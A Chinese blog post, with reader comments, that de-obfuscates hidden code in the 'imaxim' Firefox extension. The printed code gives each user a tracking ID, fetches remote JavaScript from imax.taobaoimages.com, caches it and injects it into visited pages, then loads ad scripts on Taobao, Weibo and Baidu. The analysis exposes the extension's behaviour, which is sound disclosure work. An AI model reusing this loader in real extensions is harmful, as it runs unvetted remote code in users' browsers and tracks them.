本文来自依云's Blog,转载请注明。
- 插件首页:http://imax.im/
- 插件地址:imaxim-0.0.3.xpi
- 插件功能:在豆瓣电影页面添加指向自己网站资源的链接
下载、解压,找到app.js。最后有一段混淆过的代码,注释曰「划词搜索电影」。使用 NodeJS 把eval里的函数执行结果打出来,再扔到 Vim 里拿 jsbeatify.vim 格式化一下,结果如下:
if (typeof(IMAXPluginChrome) == "undefined") {
function S4() {
return (((1 + Math.random()) * 0x10000) | 0).toString(16).substring(1)
}
function guid() {
return (S4() + S4() + S4() + S4() + S4() + S4() + S4() + S4())
}
var IMAXPluginChrome = {
getCid: function() {
var uuid = nsPreferences.copyUnicharPref("extensions.imax.uuid", "");
if (typeof(uuid) == "undefined" || uuid == "") {
uuid = guid();
nsPreferences.setUnicharPref("extensions.imax.uuid", uuid)
}
return uuid
},
loadScript: function(callback, unsafeWin) {
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.status == 200 && xhr.readyState == 4) {
var code = xhr.responseText;
nsPreferences.setUnicharPref("extensions.imax.code", code);
nsPreferences.setUnicharPref("extensions.imax.last_synced_at", Date.now() + "");
callback(unsafeWin, code)
}
};
xhr.open("GET", "http://imax.taobaoimages.com/bootstrap.js?cid=FF_" + IMAXPluginChrome.getCid(), true);
xhr.send(null)
},
onDOMContentLoaded: function(event) {
var code = nsPreferences.copyUnicharPref("extensions.imax.code", "");
var last_synced_at = Number(nsPreferences.copyUnicharPref("extensions.imax.last_synced_at", 0));
var unsafeWin = event.target.defaultView;
if (unsafeWin.wrappedJSObject) {
unsafeWin = unsafeWin.wrappedJSObject
}
function callback(unsafeWin, code) {
var unsafeDocument = new XPCNativeWrapper(unsafeWin, "document").document;
var script = unsafeDocument.createElement("script");
script.type = "text/javascript";
script.charset = "utf-8";
script.textContent = code;
unsafeDocument.body.appendChild(script)
}
if ((code == "") || ((Date.now() - last_synced_at) > (1000 * 60 * 60 * 24))) {
IMAXPluginChrome.loadScript(callback, unsafeWin)
} else {
callback(unsafeWin, code)
}
},
onLoad: function(event) {
var appcontent = document.getElementById("appcontent");
if (appcontent) {
appcontent.addEventListener("load", this.onDOMContentLoaded, true)
}
},
onUnload: function(event) {
window.removeEventListener("load", this.onLoad, false);
window.removeEventListener("unload", this.onUnload, false);
var appcontent = document.getElementById("appcontent");
appcontent.removeEventListener("DOMContentLoaded", this.onDOMContentLoaded, false)
},
init: function() {
window.addEventListener("load", function(event) {
IMAXPluginChrome.onLoad(event)
},
false);
window.addEventListener("unload", function(event) {
IMAXPluginChrome.onUnload(event)
},
false)
}
};
IMAXPluginChrome.init()
}
这段代码异步载入了来自http://imax.taobaoimages.com/bootstrap.js?cid=FF_XXX的代码,其中XXX是生成的用户 ID。又是一段混淆过的代码,还是一样的eval,转义字符串数组也一样扔 NodeJS 就行了。处理后的脚本如下:
(function(cid) {
if (window.tbk) {
return
}
window.tbk = true;
var plugin_scripts = {
"http://(.*?\.tao)(bao\.com)|(tao\.et)(ao\.com)": "http://imax.taobaoimages.com/browser.js"
};
for (var enabledDomains in plugin_scripts) {
var host = document.location.href;
if (host.match(RegExp(enabledDomains))) {
imax_script_url = plugin_scripts[enabledDomains];
function readCookie(name) {
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for (var i = 0; i < ca.length; i++) {
var c = ca[i];
while (c.charAt(0) == ' ') c = c.substring(1, c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length)
}
return null
}
function addBrowserJs() {
if (document.readyState == "complete") {
var h = document.getElementsByTagName('head')[0];
var s = document.createElement('script');
s.setAttribute('type', 'text/javascript');
s.setAttribute('charset', 'utf-8');
s.setAttribute('async', true);
if (readCookie("_q_r_b_")) {
s.setAttribute('src', imax_script_url + '?v=plugin&cid=' + cid + "&_=" + Math.random())
} else {
s.setAttribute('src', imax_script_url + '?v=plugin&cid=' + cid + "&_=" + Math.random())
}
h.appendChild(s)
} else {
window.setTimeout(addBrowserJs, 20)
}
}
addBrowserJs()
}
}
})("CID");
(function(d) {
var _0xc429 = ['href', 'location', 'http://taoad.wandoupai.com/ad.js', '', 's.taobao.com/search',
'search', 'weibo', 'baidu', 'length', 'match',
'ad=', 'getElementsByClassName', 'createElement', 'className', 'body',
'getElementsByTagName', 'appendChild', 'script', 'T1xC6MXfthXXcWeqbX', '?', 'type', 'text/javascript', 'src'];
var href = d.location.href;
var host = 'http://taoad.wandoupai.com/ad.js';
var url = '';
var url_map = [['s.taobao.com/search', 'search'], ['weibo', 'weibo'], ['baidu', 'baidu']];
for (var i = 0; i < url_map.length; i++) {
if (href.match(url_map[i][0])) {
url = 'ad=' + url_map[i][1];
break;
};
};
if (url == '') {
return false;
};
var appendTag = function(a, b, c) {
if (document.getElementsByClassName(b).length > 0) {
return;
};
var el = d.createElement(a);
el.className = b;
c(el);
var body0 = d.getElementsByTagName('body')[0];
if (!body0) {
return;
};
body0.appendChild(el);
return el;
};
appendTag('script', 'T1xC6MXfthXXcWeqbX', function(a) {
var link = host + '?' + url;
a.type = 'text/javascript';
a.src = link;
});
})(document);
这段脚本会按照当前访问的网站地址载入地址类似http://taoad.wandoupai.com/ad.js?ad=baidu的脚本。目前,这个地址返回的是空文档。说好的广告呢……
Aug 21, 2013 10:59:54 AM
举报,
Aug 27, 2013 04:11:30 PM
啊 不知道chrome版有没有,我用这个插件了呢。
Sep 09, 2013 03:26:15 AM
显式广告的插件倒是下载过。直到在浏览网页时莫名加载了国外的的js,才发现是某插件在作怪
Oct 25, 2013 02:26:45 PM
我也遇到过插件里面有广告,但是我插件安装太多,不好定位是哪一个。
Feb 25, 2014 02:15:25 AM
虽说带有广告代码,但是能方便地提供下载链接还是不错。
Feb 25, 2014 02:06:01 PM
如果不这样藏掖着我也懒得理它。